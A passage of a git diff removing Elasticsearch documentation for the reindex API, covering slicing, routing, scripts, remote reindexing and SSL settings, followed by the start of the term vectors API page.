--------------------------------------------------- - -Since the batch is issued as a single `_bulk` request, large batch sizes -cause Elasticsearch to create many requests and then wait for a while before -starting the next set. This is "bursty" instead of "smooth". - -[[docs-reindex-rethrottle]] -===== Rethrottling - -The value of `requests_per_second` can be changed on a running reindex using -the `_rethrottle` API: - -[source,console] --------------------------------------------------- -POST _reindex/r1A2WoRbTwKZ516z6NEs5A:36619/_rethrottle?requests_per_second=-1 --------------------------------------------------- - -The task ID can be found using the <>. - -Just like when setting it on the Reindex API, `requests_per_second` -can be either `-1` to disable throttling or any decimal number -like `1.7` or `12` to throttle to that level. Rethrottling that speeds up the -query takes effect immediately, but rethrottling that slows down the query will -take effect after completing the current batch. This prevents scroll -timeouts. - -[[docs-reindex-slice]] -===== Slicing - -Reindex supports <> to parallelize the reindexing process. -This parallelization can improve efficiency and provide a convenient way to -break the request down into smaller parts. - -NOTE: Reindexing from remote clusters does not support -<> or -<>. - -[[docs-reindex-manual-slice]] -====== Manual slicing -Slice a reindex request manually by providing a slice id and total number of -slices to each request: - -[source,console] ----------------------------------------------------------------- -POST _reindex -{ - "source": { - "index": "my-index-000001", - "slice": { - "id": 0, - "max": 2 - } - }, - "dest": { - "index": "my-new-index-000001" - } -} -POST _reindex -{ - "source": { - "index": "my-index-000001", - "slice": { - "id": 1, - "max": 2 - } - }, - "dest": { - "index": "my-new-index-000001" - } -} ----------------------------------------------------------------- -// TEST[setup:my_index_big] - -You can verify this works by: - -[source,console] ----------------------------------------------------------------- -GET _refresh -POST my-new-index-000001/_search?size=0&filter_path=hits.total ----------------------------------------------------------------- -// TEST[continued] - -which results in a sensible `total` like this one: - -[source,console-result] ----------------------------------------------------------------- -{ - "hits": { - "total" : { - "value": 120, - "relation": "eq" - } - } -} ----------------------------------------------------------------- - -[[docs-reindex-automatic-slice]] -====== Automatic slicing - -You can also let `_reindex` automatically parallelize using <> to -slice on `_id`. Use `slices` to specify the number of slices to use: - -[source,console] ----------------------------------------------------------------- -POST _reindex?slices=5&refresh -{ - "source": { - "index": "my-index-000001" - }, - "dest": { - "index": "my-new-index-000001" - } -} ----------------------------------------------------------------- -// TEST[setup:my_index_big] - -You can also this verify works by: - -[source,console] ----------------------------------------------------------------- -POST my-new-index-000001/_search?size=0&filter_path=hits.total ----------------------------------------------------------------- -// TEST[continued] - -which results in a sensible `total` like this one: - -[source,console-result] ----------------------------------------------------------------- -{ - "hits": { - "total" : { - "value": 120, - "relation": "eq" - } - } -} ----------------------------------------------------------------- - -Setting `slices` to `auto` will let Elasticsearch choose the number of slices to -use. This setting will use one slice per shard, up to a certain limit. If there -are multiple sources, it will choose the number of -slices based on the index or <> with the smallest -number of shards. - -Adding `slices` to `_reindex` just automates the manual process used in the -section above, creating sub-requests which means it has some quirks: - -* You can see these requests in the <>. These -sub-requests are "child" tasks of the task for the request with `slices`. -* Fetching the status of the task for the request with `slices` only contains -the status of completed slices. -* These sub-requests are individually addressable for things like cancelation -and rethrottling. -* Rethrottling the request with `slices` will rethrottle the unfinished -sub-request proportionally. -* Canceling the request with `slices` will cancel each sub-request. -* Due to the nature of `slices` each sub-request won't get a perfectly even -portion of the documents. All documents will be addressed, but some slices may -be larger than others. Expect larger slices to have a more even distribution. -* Parameters like `requests_per_second` and `max_docs` on a request with -`slices` are distributed proportionally to each sub-request. Combine that with -the point above about distribution being uneven and you should conclude that -using `max_docs` with `slices` might not result in exactly `max_docs` documents -being reindexed. -* Each sub-request gets a slightly different snapshot of the source, -though these are all taken at approximately the same time. - -[[docs-reindex-picking-slices]] -====== Picking the number of slices - -If slicing automatically, setting `slices` to `auto` will choose a reasonable -number for most indices. If slicing manually or otherwise tuning -automatic slicing, use these guidelines. - -Query performance is most efficient when the number of `slices` is equal to the -number of shards in the index. If that number is large (e.g. 500), -choose a lower number as too many `slices` will hurt performance. Setting -`slices` higher than the number of shards generally does not improve efficiency -and adds overhead. - -Indexing performance scales linearly across available resources with the -number of slices. - -Whether query or indexing performance dominates the runtime depends on the -documents being reindexed and cluster resources. - -[[docs-reindex-routing]] -===== Reindex routing - -By default if `_reindex` sees a document with routing then the routing is -preserved unless it's changed by the script. You can set `routing` on the -`dest` request to change this: - -`keep`:: - -Sets the routing on the bulk request sent for each match to the routing on -the match. This is the default value. - -`discard`:: - -Sets the routing on the bulk request sent for each match to `null`. - -`=`:: - -Sets the routing on the bulk request sent for each match to all text after -the `=`. - -For example, you can use the following request to copy all documents from -the `source` with the company name `cat` into the `dest` with -routing set to `cat`. - -[source,console] --------------------------------------------------- -POST _reindex -{ - "source": { - "index": "source", - "query": { - "match": { - "company": "cat" - } - } - }, - "dest": { - "index": "dest", - "routing": "=cat" - } -} --------------------------------------------------- -// TEST[s/^/PUT source\n/] - - - -By default `_reindex` uses scroll batches of 1000. You can change the -batch size with the `size` field in the `source` element: - -[source,console] --------------------------------------------------- -POST _reindex -{ - "source": { - "index": "source", - "size": 100 - }, - "dest": { - "index": "dest", - "routing": "=cat" - } -} --------------------------------------------------- -// TEST[s/^/PUT source\n/] - -[[reindex-with-an-ingest-pipeline]] -===== Reindex with an ingest pipeline - -Reindex can also use the <> feature by specifying a -`pipeline` like this: - -[source,console] --------------------------------------------------- -POST _reindex -{ - "source": { - "index": "source" - }, - "dest": { - "index": "dest", - "pipeline": "some_ingest_pipeline" - } -} --------------------------------------------------- -// TEST[s/^/PUT source\n/] - -[[docs-reindex-api-query-params]] -==== {api-query-parms-title} - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=refresh] - -`timeout`:: -+ --- -(Optional, <>) -Period each indexing waits for the following operations: - -* <> -* <> updates -* <> - -Defaults to `1m` (one minute). This guarantees {es} waits for at least the -timeout before failing. The actual wait time could be longer, particularly when -multiple waits occur. --- - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=wait_for_active_shards] - -`wait_for_completion`:: -(Optional, Boolean) If `true`, the request blocks until the operation is complete. -Defaults to `true`. - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=requests_per_second] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=require-alias] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=scroll] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=slices] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=max_docs] - -[[docs-reindex-api-request-body]] -==== {api-request-body-title} - -`conflicts`:: -(Optional, enum) Set to `proceed` to continue reindexing even if there are conflicts. -Defaults to `abort`. - -`source`:: -`index`::: -(Required, string) The name of the data stream, index, or index alias you are copying _from_. -Also accepts a comma-separated list to reindex from multiple sources. - -`max_docs`::: -(Optional, integer) The maximum number of documents to reindex. - -`query`::: -(Optional, <>) Specifies the documents to reindex using the Query DSL. - -`remote`::: -`host`:::: -(Optional, string) The URL for the remote instance of {es} that you want to index _from_. -Required when indexing from remote. -`username`:::: -(Optional, string) The username to use for authentication with the remote host. -`password`:::: -(Optional, string) The password to use for authentication with the remote host. -`socket_timeout`:::: -(Optional, <>) The remote socket read timeout. Defaults to 30 seconds. -`connect_timeout`:::: -(Optional, <>) The remote connection timeout. Defaults to 30 seconds. - -`size`::: -{Optional, integer) The number of documents to index per batch. -Use when indexing from remote to ensure that the batches fit within the on-heap buffer, -which defaults to a maximum size of 100 MB. - -`slice`::: -`id`:::: -(Optional, integer) Slice ID for <>. -`max`:::: -(Optional, integer) Total number of slices. - -`sort`::: -+ --- -(Optional, list) A comma-separated list of `:` pairs to sort by before indexing. -Use in conjunction with `max_docs` to control what documents are reindexed. - -deprecated::[7.6, Sort in reindex is deprecated. Sorting in reindex was never guaranteed to index documents in order and prevents further development of reindex such as resilience and performance improvements. If used in combination with `max_docs`, consider using a query filter instead.] --- - -`_source`::: -(Optional, string) If `true` reindexes all source fields. -Set to a list to reindex select fields. -Defaults to `true`. - -`dest`:: -`index`::: -(Required, string) The name of the data stream, index, or index alias you are copying _to_. - -`version_type`::: -(Optional, enum) The versioning to use for the indexing operation. -Valid values: `internal`, `external`, `external_gt`, `external_gte`. -See <> for more information. - -`op_type`::: -(Optional, enum) Set to create to only index documents that do not already exist (put if absent). -Valid values: `index`, `create`. Defaults to `index`. -+ -IMPORTANT: To reindex to a data stream destination, this argument must be -`create`. - -`type`::: -(Optional, string) -deprecated:[6.0.0,Types are deprecated and in the process of being removed. See <>.] -<> for reindexed documents. -Defaults to `_doc`. -+ -[WARNING] -==== -Types in source indices are always ignored, also when not specifying a -destination `type`. If explicitly specifying destination `type`, the specified -type must match the type in the destination index or be either unspecified or -the special value `_doc`. See <> for further details. -==== - -`script`:: -`source`::: -(Optional, string) The script to run to update the document source or metadata when reindexing. -`lang`::: -(Optional, enum) The script language: `painless`, `expression`, `mustache`, `java`. -For more information, see <>. - - -[[docs-reindex-api-response-body]] -==== {api-response-body-title} - -`took`:: - -(integer) The total milliseconds the entire operation took. - -`timed_out`:: - -{Boolean) This flag is set to `true` if any of the requests executed during the -reindex timed out. - -`total`:: - -(integer) The number of documents that were successfully processed. - -`updated`:: -(integer) The number of documents that were successfully updated, -i.e. a document with same ID already existed prior to reindex updating it. - -`created`:: - -(integer) The number of documents that were successfully created. - -`deleted`:: - -(integer) The number of documents that were successfully deleted. - -`batches`:: - -(integer) The number of scroll responses pulled back by the reindex. - -`noops`:: - -(integer) The number of documents that were ignored because the script used for -the reindex returned a `noop` value for `ctx.op`. - -`version_conflicts`:: - -(integer) The number of version conflicts that reindex hits. - -`retries`:: - -(integer) The number of retries attempted by reindex. `bulk` is the number of bulk -actions retried and `search` is the number of search actions retried. - -`throttled_millis`:: - -(integer) Number of milliseconds the request slept to conform to `requests_per_second`. - -`requests_per_second`:: - -(integer) The number of requests per second effectively executed during the reindex. - -`throttled_until_millis`:: - -(integer) This field should always be equal to zero in a `_reindex` response. It only -has meaning when using the <>, where it -indicates the next time (in milliseconds since epoch) a throttled request will be -executed again in order to conform to `requests_per_second`. - -`failures`:: - -(array) Array of failures if there were any unrecoverable errors during the process. If -this is non-empty then the request aborted because of those failures. Reindex -is implemented using batches and any failure causes the entire process to abort -but all failures in the current batch are collected into the array. You can use -the `conflicts` option to prevent reindex from aborting on version conflicts. - -[[docs-reindex-api-example]] -==== {api-examples-title} - -[[docs-reindex-select-query]] -===== Reindex select documents with a query - -You can limit the documents by adding a query to the `source`. -For example, the following request only copies documents with a `user.id` of `kimchy` into `my-new-index-000001`: - -[source,console] --------------------------------------------------- -POST _reindex -{ - "source": { - "index": "my-index-000001", - "query": { - "term": { - "user.id": "kimchy" - } - } - }, - "dest": { - "index": "my-new-index-000001" - } -} --------------------------------------------------- -// TEST[setup:my_index] - -[[docs-reindex-select-max-docs]] -===== Reindex select documents with `max_docs` - -You can limit the number of processed documents by setting `max_docs`. -For example, this request copies a single document from `my-index-000001` to -`my-new-index-000001`: - -[source,console] --------------------------------------------------- -POST _reindex -{ - "max_docs": 1, - "source": { - "index": "my-index-000001" - }, - "dest": { - "index": "my-new-index-000001" - } -} --------------------------------------------------- -// TEST[setup:my_index] - -[[docs-reindex-multiple-sources]] -===== Reindex from multiple sources - -The `index` attribute in `source` can be a list, allowing you to copy from lots -of sources in one request. This will copy documents from the -`my-index-000001` and `my-index-000002` indices: - -[source,console] --------------------------------------------------- -POST _reindex -{ - "source": { - "index": ["my-index-000001", "my-index-000002"] - }, - "dest": { - "index": "my-new-index-000002" - } -} --------------------------------------------------- -// TEST[setup:my_index] -// TEST[s/^/PUT my-index-000002\/_doc\/post1?refresh\n{"test": "foo"}\n/] - -NOTE: The Reindex API makes no effort to handle ID collisions so the last -document written will "win" but the order isn't usually predictable so it is -not a good idea to rely on this behavior. Instead, make sure that IDs are unique -using a script. - -[[docs-reindex-filter-source]] -===== Reindex select fields with a source filter - -You can use source filtering to reindex a subset of the fields in the original documents. -For example, the following request only reindexes the `user.id` and `_doc` fields of each document: - -[source,console] --------------------------------------------------- -POST _reindex -{ - "source": { - "index": "my-index-000001", - "_source": ["user.id", "_doc"] - }, - "dest": { - "index": "my-new-index-000001" - } -} --------------------------------------------------- -// TEST[setup:my_index] - -[[docs-reindex-change-name]] -===== Reindex to change the name of a field - -`_reindex` can be used to build a copy of an index with renamed fields. Say you -create an index containing documents that look like this: - -[source,console] --------------------------------------------------- -POST my-index-000001/_doc/1?refresh -{ - "text": "words words", - "flag": "foo" -} --------------------------------------------------- - -but you don't like the name `flag` and want to replace it with `tag`. -`_reindex` can create the other index for you: - -[source,console] --------------------------------------------------- -POST _reindex -{ - "source": { - "index": "my-index-000001" - }, - "dest": { - "index": "my-new-index-000001" - }, - "script": { - "source": "ctx._source.tag = ctx._source.remove(\"flag\")" - } -} --------------------------------------------------- -// TEST[continued] - -Now you can get the new document: - -[source,console] --------------------------------------------------- -GET my-new-index-000001/_doc/1 --------------------------------------------------- -// TEST[continued] - -which will return: - -[source,console-result] --------------------------------------------------- -{ - "found": true, - "_id": "1", - "_index": "my-new-index-000001", - "_type": "_doc", - "_version": 1, - "_seq_no": 44, - "_primary_term": 1, - "_source": { - "text": "words words", - "tag": "foo" - } -} --------------------------------------------------- -// TESTRESPONSE[s/"_seq_no": \d+/"_seq_no" : $body._seq_no/ s/"_primary_term": 1/"_primary_term" : $body._primary_term/] - -[[docs-reindex-daily-indices]] -===== Reindex daily indices - -You can use `_reindex` in combination with <> to reindex -daily indices to apply a new template to the existing documents. - -Assuming you have indices that contain documents like: - -[source,console] ----------------------------------------------------------------- -PUT metricbeat-2016.05.30/_doc/1?refresh -{"system.cpu.idle.pct": 0.908} -PUT metricbeat-2016.05.31/_doc/1?refresh -{"system.cpu.idle.pct": 0.105} ----------------------------------------------------------------- - -The new template for the `metricbeat-*` indices is already loaded into Elasticsearch, -but it applies only to the newly created indices. Painless can be used to reindex -the existing documents and apply the new template. - -The script below extracts the date from the index name and creates a new index -with `-1` appended. All data from `metricbeat-2016.05.31` will be reindexed -into `metricbeat-2016.05.31-1`. - -[source,console] ----------------------------------------------------------------- -POST _reindex -{ - "source": { - "index": "metricbeat-*" - }, - "dest": { - "index": "metricbeat" - }, - "script": { - "lang": "painless", - "source": "ctx._index = 'metricbeat-' + (ctx._index.substring('metricbeat-'.length(), ctx._index.length())) + '-1'" - } -} ----------------------------------------------------------------- -// TEST[continued] - -All documents from the previous metricbeat indices can now be found in the `*-1` indices. - -[source,console] ----------------------------------------------------------------- -GET metricbeat-2016.05.30-1/_doc/1 -GET metricbeat-2016.05.31-1/_doc/1 ----------------------------------------------------------------- -// TEST[continued] - -The previous method can also be used in conjunction with <> -to load only the existing data into the new index and rename any fields if needed. - -[[docs-reindex-api-subset]] -===== Extract a random subset of the source - -`_reindex` can be used to extract a random subset of the source for testing: - -[source,console] ----------------------------------------------------------------- -POST _reindex -{ - "max_docs": 10, - "source": { - "index": "my-index-000001", - "query": { - "function_score" : { - "random_score" : {}, - "min_score" : 0.9 <1> - } - } - }, - "dest": { - "index": "my-new-index-000001" - } -} ----------------------------------------------------------------- -// TEST[setup:my_index_big] - -<1> You may need to adjust the `min_score` depending on the relative amount of -data extracted from source. - -[[reindex-scripts]] -===== Modify documents during reindexing - -Like `_update_by_query`, `_reindex` supports a script that modifies the -document. Unlike `_update_by_query`, the script is allowed to modify the -document's metadata. This example bumps the version of the source document: - -[source,console] --------------------------------------------------- -POST _reindex -{ - "source": { - "index": "my-index-000001" - }, - "dest": { - "index": "my-new-index-000001", - "version_type": "external" - }, - "script": { - "source": "if (ctx._source.foo == 'bar') {ctx._version++; ctx._source.remove('foo')}", - "lang": "painless" - } -} --------------------------------------------------- -// TEST[setup:my_index] - -Just as in `_update_by_query`, you can set `ctx.op` to change the -operation that is executed on the destination: - -`noop`:: - -Set `ctx.op = "noop"` if your script decides that the document doesn't have -to be indexed in the destination. This no operation will be reported -in the `noop` counter in the <>. - -`delete`:: - -Set `ctx.op = "delete"` if your script decides that the document must be - deleted from the destination. The deletion will be reported in the - `deleted` counter in the <>. - -Setting `ctx.op` to anything else will return an error, as will setting any -other field in `ctx`. - -Think of the possibilities! Just be careful; you are able to -change: - - * `_id` - * `_index` - * `_version` - * `_routing` - -Setting `_version` to `null` or clearing it from the `ctx` map is just like not -sending the version in an indexing request; it will cause the document to be -overwritten in the destination regardless of the version on the target or the -version type you use in the `_reindex` request. - -[[reindex-from-remote]] -==== Reindex from remote - -Reindex supports reindexing from a remote Elasticsearch cluster: - -[source,console] --------------------------------------------------- -POST _reindex -{ - "source": { - "remote": { - "host": "http://otherhost:9200", - "username": "user", - "password": "pass" - }, - "index": "my-index-000001", - "query": { - "match": { - "test": "data" - } - } - }, - "dest": { - "index": "my-new-index-000001" - } -} --------------------------------------------------- -// TEST[setup:host] -// TEST[s/^/PUT my-index-000001\n/] -// TEST[s/otherhost:9200",/\${host}"/] -// TEST[s/"username": "user",//] -// TEST[s/"password": "pass"//] - -The `host` parameter must contain a scheme, host, port (e.g. -`https://otherhost:9200`), and optional path (e.g. `https://otherhost:9200/proxy`). -The `username` and `password` parameters are optional, and when they are present `_reindex` -will connect to the remote Elasticsearch node using basic auth. Be sure to use `https` when -using basic auth or the password will be sent in plain text. -There are a range of <> available to configure the behaviour of the - `https` connection. - -Remote hosts have to be explicitly allowed in elasticsearch.yml using the -`reindex.remote.whitelist` property. It can be set to a comma delimited list -of allowed remote `host` and `port` combinations. Scheme is -ignored, only the host and port are used. For example: - - -[source,yaml] --------------------------------------------------- -reindex.remote.whitelist: "otherhost:9200, another:9200, 127.0.10.*:9200, localhost:*" --------------------------------------------------- - -The list of allowed hosts must be configured on any nodes that will coordinate the reindex. - -This feature should work with remote clusters of any version of Elasticsearch -you are likely to find. This should allow you to upgrade from any version of -Elasticsearch to the current version by reindexing from a cluster of the old -version. - -WARNING: {es} does not support forward compatibility across major versions. For -example, you cannot reindex from a 7.x cluster into a 6.x cluster. - -To enable queries sent to older versions of Elasticsearch the `query` parameter -is sent directly to the remote host without validation or modification. - -NOTE: Reindexing from remote clusters does not support -<> or -<>. - -Reindexing from a remote server uses an on-heap buffer that defaults to a -maximum size of 100mb. If the remote index includes very large documents you'll -need to use a smaller batch size. The example below sets the batch size to `10` -which is very, very small. - -[source,console] --------------------------------------------------- -POST _reindex -{ - "source": { - "remote": { - "host": "http://otherhost:9200" - }, - "index": "source", - "size": 10, - "query": { - "match": { - "test": "data" - } - } - }, - "dest": { - "index": "dest" - } -} --------------------------------------------------- -// TEST[setup:host] -// TEST[s/^/PUT source\n/] -// TEST[s/otherhost:9200/\${host}/] - -It is also possible to set the socket read timeout on the remote connection -with the `socket_timeout` field and the connection timeout with the -`connect_timeout` field. Both default to 30 seconds. This example -sets the socket read timeout to one minute and the connection timeout to 10 -seconds: - -[source,console] --------------------------------------------------- -POST _reindex -{ - "source": { - "remote": { - "host": "http://otherhost:9200", - "socket_timeout": "1m", - "connect_timeout": "10s" - }, - "index": "source", - "query": { - "match": { - "test": "data" - } - } - }, - "dest": { - "index": "dest" - } -} --------------------------------------------------- -// TEST[setup:host] -// TEST[s/^/PUT source\n/] -// TEST[s/otherhost:9200/\${host}/] - -[[reindex-ssl]] -===== Configuring SSL parameters - -Reindex from remote supports configurable SSL settings. These must be -specified in the `elasticsearch.yml` file, with the exception of the -secure settings, which you add in the Elasticsearch keystore. -It is not possible to configure SSL in the body of the `_reindex` request. - -The following settings are supported: - -`reindex.ssl.certificate_authorities`:: -List of paths to PEM encoded certificate files that should be trusted. -You cannot specify both `reindex.ssl.certificate_authorities` and -`reindex.ssl.truststore.path`. - -`reindex.ssl.truststore.path`:: -The path to the Java Keystore file that contains the certificates to trust. -This keystore can be in "JKS" or "PKCS#12" format. -You cannot specify both `reindex.ssl.certificate_authorities` and -`reindex.ssl.truststore.path`. - -`reindex.ssl.truststore.password`:: -The password to the truststore (`reindex.ssl.truststore.path`). -This setting cannot be used with `reindex.ssl.truststore.secure_password`. - -`reindex.ssl.truststore.secure_password` (<>):: -The password to the truststore (`reindex.ssl.truststore.path`). -This setting cannot be used with `reindex.ssl.truststore.password`. - -`reindex.ssl.truststore.type`:: -The type of the truststore (`reindex.ssl.truststore.path`). -Must be either `jks` or `PKCS12`. If the truststore path ends in ".p12", ".pfx" -or "pkcs12", this setting defaults to `PKCS12`. Otherwise, it defaults to `jks`. - -`reindex.ssl.verification_mode`:: -Indicates the type of verification to protect against man in the middle attacks -and certificate forgery. -One of `full` (verify the hostname and the certificate path), `certificate` -(verify the certificate path, but not the hostname) or `none` (perform no -verification - this is strongly discouraged in production environments). -Defaults to `full`. - -`reindex.ssl.certificate`:: -Specifies the path to the PEM encoded certificate (or certificate chain) to be -used for HTTP client authentication (if required by the remote cluster) -This setting requires that `reindex.ssl.key` also be set. -You cannot specify both `reindex.ssl.certificate` and `reindex.ssl.keystore.path`. - -`reindex.ssl.key`:: -Specifies the path to the PEM encoded private key associated with the -certificate used for client authentication (`reindex.ssl.certificate`). -You cannot specify both `reindex.ssl.key` and `reindex.ssl.keystore.path`. - -`reindex.ssl.key_passphrase`:: -Specifies the passphrase to decrypt the PEM encoded private key -(`reindex.ssl.key`) if it is encrypted. -Cannot be used with `reindex.ssl.secure_key_passphrase`. - -`reindex.ssl.secure_key_passphrase` (<>):: -Specifies the passphrase to decrypt the PEM encoded private key -(`reindex.ssl.key`) if it is encrypted. -Cannot be used with `reindex.ssl.key_passphrase`. - -`reindex.ssl.keystore.path`:: -Specifies the path to the keystore that contains a private key and certificate -to be used for HTTP client authentication (if required by the remote cluster). -This keystore can be in "JKS" or "PKCS#12" format. -You cannot specify both `reindex.ssl.key` and `reindex.ssl.keystore.path`. - -`reindex.ssl.keystore.type`:: -The type of the keystore (`reindex.ssl.keystore.path`). Must be either `jks` or `PKCS12`. -If the keystore path ends in ".p12", ".pfx" or "pkcs12", this setting defaults -to `PKCS12`. Otherwise, it defaults to `jks`. - -`reindex.ssl.keystore.password`:: -The password to the keystore (`reindex.ssl.keystore.path`). This setting cannot be used -with `reindex.ssl.keystore.secure_password`. - -`reindex.ssl.keystore.secure_password` (<>):: -The password to the keystore (`reindex.ssl.keystore.path`). -This setting cannot be used with `reindex.ssl.keystore.password`. - -`reindex.ssl.keystore.key_password`:: -The password for the key in the keystore (`reindex.ssl.keystore.path`). -Defaults to the keystore password. This setting cannot be used with -`reindex.ssl.keystore.secure_key_password`. - -`reindex.ssl.keystore.secure_key_password` (<>):: -The password for the key in the keystore (`reindex.ssl.keystore.path`). -Defaults to the keystore password. This setting cannot be used with -`reindex.ssl.keystore.key_password`. diff --git a/docs/reference/docs/termvectors.asciidoc b/docs/reference/docs/termvectors.asciidoc deleted file mode 100644 index 8cd4e11232e..00000000000 --- a/docs/reference/docs/termvectors.asciidoc +++ /dev/null @@ -1,478 +0,0 @@ -[[docs-termvectors]] -=== Term vectors API -++++ -Term vectors -++++ - -Retrieves information and statistics for terms in the fields of a particular document. - -[source,console] --------------------------------------------------- -GET /my-index-000001/_termvectors/1 --------------------------------------------------- -// TEST[setup:my_index] - -[[docs-termvectors-api-request]] -==== {api-request-title} - -`GET //_termvectors/<_id>` - -[[docs-termvectors-api-prereqs]] -==== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have the `read` -<> for the target index or index alias. - -[[docs-termvectors-api-desc]] -==== {api-description-title} - -You can retrieve term vectors for documents stored in the index or -for _artificial_ documents passed in the body of the request. - -You can specify the fields you are interested in through the `fields` parameter, -or by adding the fields to the request body. - -[source,console] --------------------------------------------------- -GET /my-index-000001/_termvectors/1?fields=message --------------------------------------------------- -// TEST[setup:my_index] - -Fields can be specified using wildcards, similar to the <>. - -Term vectors are <> by default, not near real-time. -This can be changed by setting `realtime` parameter to `false`. - -You can request three types of values: _term information_, _term statistics_ -and _field statistics_. By default, all term information and field -statistics are returned for all fields but term statistics are excluded. - -[[docs-termvectors-api-term-info]] -===== Term information - - * term frequency in the field (always returned) - * term positions (`positions` : true) - * start and end offsets (`offsets` : true) - * term payloads (`payloads` : true), as base64 encoded bytes - -If the requested information wasn't stored in the index, it will be -computed on the fly if possible. Additionally, term vectors could be computed -for documents not even existing in the index, but instead provided by the user. - -[WARNING] -====== -Start and end offsets assume UTF-16 encoding is being used. If you want to use -these offsets in order to get the original text that produced this token, you -should make sure that the string you are taking a sub-string of is also encoded -using UTF-16. -====== - -[[docs-termvectors-api-term-stats]] -===== Term statistics - -Setting `term_statistics` to `true` (default is `false`) will -return - - * total term frequency (how often a term occurs in all documents) + - * document frequency (the number of documents containing the current - term) - -By default these values are not returned since term statistics can -have a serious performance impact. - -[[docs-termvectors-api-field-stats]] -===== Field statistics - -Setting `field_statistics` to `false` (default is `true`) will -omit : - - * document count (how many documents contain this field) - * sum of document frequencies (the sum of document frequencies for all - terms in this field) - * sum of total term frequencies (the sum of total term frequencies of - each term in this field) - -[[docs-termvectors-api-terms-filtering]] -===== Terms filtering - -With the parameter `filter`, the terms returned could also be filtered based -on their tf-idf scores. This could be useful in order find out a good -characteristic vector of a document. This feature works in a similar manner to -the <> of the -<>. See <> -for usage. - -The following sub-parameters are supported: - -[horizontal] -`max_num_terms`:: - Maximum number of terms that must be returned per field. Defaults to `25`. -`min_term_freq`:: - Ignore words with less than this frequency in the source doc. Defaults to `1`. -`max_term_freq`:: - Ignore words with more than this frequency in the source doc. Defaults to unbounded. -`min_doc_freq`:: - Ignore terms which do not occur in at least this many docs. Defaults to `1`. -`max_doc_freq`:: - Ignore words which occur in more than this many docs. Defaults to unbounded. -`min_word_length`:: - The minimum word length below which words will be ignored. Defaults to `0`. -`max_word_length`:: - The maximum word length above which words will be ignored. Defaults to unbounded (`0`). - -[[docs-termvectors-api-behavior]] -==== Behaviour - -The term and field statistics are not accurate. Deleted documents -are not taken into account. The information is only retrieved for the -shard the requested document resides in. -The term and field statistics are therefore only useful as relative measures -whereas the absolute numbers have no meaning in this context. By default, -when requesting term vectors of artificial documents, a shard to get the statistics -from is randomly selected. Use `routing` only to hit a particular shard. - -[[docs-termvectors-api-path-params]] -==== {api-path-parms-title} - -``:: -(Required, string) Name of the index that contains the document. - -`<_id>`:: -(Optional, string) Unique identifier of the document. - -[[docs-termvectors-api-query-params]] -==== {api-query-parms-title} - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=fields] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=field_statistics] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=offsets] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=payloads] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=positions] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=preference] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=routing] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=realtime] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=term_statistics] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=version] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=version_type] - -[[docs-termvectors-api-example]] -==== {api-examples-title} - -[[docs-termvectors-api-stored-termvectors]] -===== Returning stored term vectors - -First, we create an index that stores term vectors, payloads etc. : - -[source,console] --------------------------------------------------- -PUT /my-index-000001 -{ "mappings": { - "properties": { - "text": { - "type": "text", - "term_vector": "with_positions_offsets_payloads", - "store" : true, - "analyzer" : "fulltext_analyzer" - }, - "fullname": { - "type": "text", - "term_vector": "with_positions_offsets_payloads", - "analyzer" : "fulltext_analyzer" - } - } - }, - "settings" : { - "index" : { - "number_of_shards" : 1, - "number_of_replicas" : 0 - }, - "analysis": { - "analyzer": { - "fulltext_analyzer": { - "type": "custom", - "tokenizer": "whitespace", - "filter": [ - "lowercase", - "type_as_payload" - ] - } - } - } - } -} --------------------------------------------------- - -Second, we add some documents: - -[source,console] --------------------------------------------------- -PUT /my-index-000001/_doc/1 -{ - "fullname" : "John Doe", - "text" : "test test test " -} - -PUT /my-index-000001/_doc/2?refresh=wait_for -{ - "fullname" : "Jane Doe", - "text" : "Another test ..." -} --------------------------------------------------- -// TEST[continued] - -The following request returns all information and statistics for field -`text` in document `1` (John Doe): - -[source,console] --------------------------------------------------- -GET /my-index-000001/_termvectors/1 -{ - "fields" : ["text"], - "offsets" : true, - "payloads" : true, - "positions" : true, - "term_statistics" : true, - "field_statistics" : true -} --------------------------------------------------- -// TEST[continued] - -Response: - -[source,console-result] --------------------------------------------------- -{ - "_index": "my-index-000001", - "_type": "_doc", - "_id": "1", - "_version": 1, - "found": true, - "took": 6, - "term_vectors": { - "text": { - "field_statistics": { - "sum_doc_freq": 4, - "doc_count": 2, - "sum_ttf": 6 - }, - "terms": { - "test": { - "doc_freq": 2, - "ttf": 4, - "term_freq": 3, - "tokens": [ - { - "position": 0, - "start_offset": 0, - "end_offset": 4, - "payload": "d29yZA==" - }, - { - "position": 1, - "start_offset": 5, - "end_offset": 9, - "payload": "d29yZA==" - }, - { - "position": 2, - "start_offset": 10, - "end_offset": 14, - "payload": "d29yZA==" - } - ] - } - } - } - } -} --------------------------------------------------- -// TEST[continued] -// TESTRESPONSE[s/"took": 6/"took": "$body.took"/] - -[[docs-termvectors-api-generate-termvectors]] -===== Generating term vectors on the fly - -Term vectors which are not explicitly stored in the index are automatically -computed on the fly. The following request returns all information and statistics for the -fields in document `1`, even though the terms haven't been explicitly stored in the index. -Note that for the field `text`, the terms are not re-generated. - -[source,console] --------------------------------------------------- -GET /my-index-000001/_termvectors/1 -{ - "fields" : ["text", "some_field_without_term_vectors"], - "offsets" : true, - "positions" : true, - "term_statistics" : true, - "field_statistics" : true -} --------------------------------------------------- -// TEST[continued] - -[[docs-termvectors-artificial-doc]] -===== Artificial documents - -Term vectors can also be generated for artificial documents, -that is for documents not present in the index. For example, the following request would -return the same results as in example 1. The mapping used is determined by the `index`. - -*If dynamic mapping is turned on 